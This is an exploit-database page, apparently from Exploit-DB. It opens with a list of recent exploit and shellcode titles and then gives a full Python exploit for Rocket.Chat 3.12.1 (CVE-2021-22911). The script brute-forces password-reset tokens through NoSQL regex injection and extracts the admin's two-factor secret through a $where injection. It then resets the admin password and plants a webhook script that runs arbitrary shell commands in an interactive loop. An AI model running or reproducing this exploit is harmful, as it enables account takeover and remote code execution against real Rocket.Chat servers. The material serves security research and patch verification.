
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
172 lines
No EOL
6.2 KiB
Python
Executable file
172 lines
No EOL
6.2 KiB
Python
Executable file
# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
|
|
# Author: enox
|
|
# Date: 06-06-2021
|
|
# Product: Rocket.Chat
|
|
# Vendor: https://rocket.chat/
|
|
# Vulnerable Version(s): Rocket.Chat 3.12.1
|
|
# CVE: CVE-2021-22911
|
|
# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
import string
|
|
import time
|
|
import hashlib
|
|
import json
|
|
import oathtool
|
|
import argparse
|
|
|
|
parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
|
|
parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
|
|
parser.add_argument('-a', help='Administrator email', required=True)
|
|
parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
|
|
args = parser.parse_args()
|
|
|
|
|
|
adminmail = args.a
|
|
lowprivmail = args.u
|
|
target = args.t
|
|
|
|
|
|
def forgotpassword(email,url):
|
|
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
|
|
headers={'content-type': 'application/json'}
|
|
r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
|
|
print("[+] Password Reset Email Sent")
|
|
|
|
|
|
def resettoken(url):
|
|
u = url+"/api/v1/method.callAnon/getPasswordPolicy"
|
|
headers={'content-type': 'application/json'}
|
|
token = ""
|
|
|
|
num = list(range(0,10))
|
|
string_ints = [str(int) for int in num]
|
|
characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
|
|
|
|
while len(token)!= 43:
|
|
for c in characters:
|
|
payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
|
|
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
|
time.sleep(0.5)
|
|
if 'Meteor.Error' not in r.text:
|
|
token += c
|
|
print(f"Got: {token}")
|
|
|
|
print(f"[+] Got token : {token}")
|
|
return token
|
|
|
|
|
|
def changingpassword(url,token):
|
|
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
|
|
headers={'content-type': 'application/json'}
|
|
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
|
|
if "error" in r.text:
|
|
exit("[-] Wrong token")
|
|
print("[+] Password was changed !")
|
|
|
|
|
|
def twofactor(url,email):
|
|
# Authenticating
|
|
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
|
|
payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
|
|
headers={'content-type': 'application/json'}
|
|
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
|
|
if "error" in r.text:
|
|
exit("[-] Couldn't authenticate")
|
|
data = json.loads(r.text)
|
|
data =(data['message'])
|
|
userid = data[32:49]
|
|
token = data[60:103]
|
|
print(f"[+] Succesfully authenticated as {email}")
|
|
|
|
# Getting 2fa code
|
|
cookies = {'rc_uid': userid,'rc_token': token}
|
|
headers={'X-User-Id': userid,'X-Auth-Token': token}
|
|
payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
|
|
r = requests.get(url+payload,cookies=cookies,headers=headers)
|
|
code = r.text[46:98]
|
|
print(f"Got the code for 2fa: {code}")
|
|
return code
|
|
|
|
|
|
def changingadminpassword(url,token,code):
|
|
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
|
|
headers={'content-type': 'application/json'}
|
|
r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
|
|
if "403" in r.text:
|
|
exit("[-] Wrong token")
|
|
|
|
print("[+] Admin password changed !")
|
|
|
|
|
|
def rce(url,code,cmd):
|
|
# Authenticating
|
|
sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
|
|
headers={'content-type': 'application/json'}
|
|
payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
|
|
r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
|
|
if "error" in r.text:
|
|
exit("[-] Couldn't authenticate")
|
|
data = json.loads(r.text)
|
|
data =(data['message'])
|
|
userid = data[32:49]
|
|
token = data[60:103]
|
|
print("[+] Succesfully authenticated as administrator")
|
|
|
|
# Creating Integration
|
|
payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
|
|
cookies = {'rc_uid': userid,'rc_token': token}
|
|
headers = {'X-User-Id': userid,'X-Auth-Token': token}
|
|
r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
|
|
data = r.text
|
|
data = data.split(',')
|
|
token = data[12]
|
|
token = token[9:57]
|
|
_id = data[18]
|
|
_id = _id[7:24]
|
|
|
|
# Triggering RCE
|
|
u = url + '/hooks/' + _id + '/' +token
|
|
r = requests.get(u)
|
|
print(r.text)
|
|
|
|
############################################################
|
|
|
|
|
|
# Getting Low Priv user
|
|
print(f"[+] Resetting {lowprivmail} password")
|
|
## Sending Reset Mail
|
|
forgotpassword(lowprivmail,target)
|
|
|
|
## Getting reset token
|
|
token = resettoken(target)
|
|
|
|
## Changing Password
|
|
changingpassword(target,token)
|
|
|
|
|
|
# Privilege Escalation to admin
|
|
## Getting secret for 2fa
|
|
secret = twofactor(target,lowprivmail)
|
|
|
|
|
|
## Sending Reset mail
|
|
print(f"[+] Resetting {adminmail} password")
|
|
forgotpassword(adminmail,target)
|
|
|
|
## Getting reset token
|
|
token = resettoken(target)
|
|
|
|
|
|
## Resetting Password
|
|
code = oathtool.generate_otp(secret)
|
|
changingadminpassword(target,token,code)
|
|
|
|
## Authenticting and triggering rce
|
|
|
|
while True:
|
|
cmd = input("CMD:> ")
|
|
code = oathtool.generate_otp(secret)
|
|
rce(target,code,cmd) |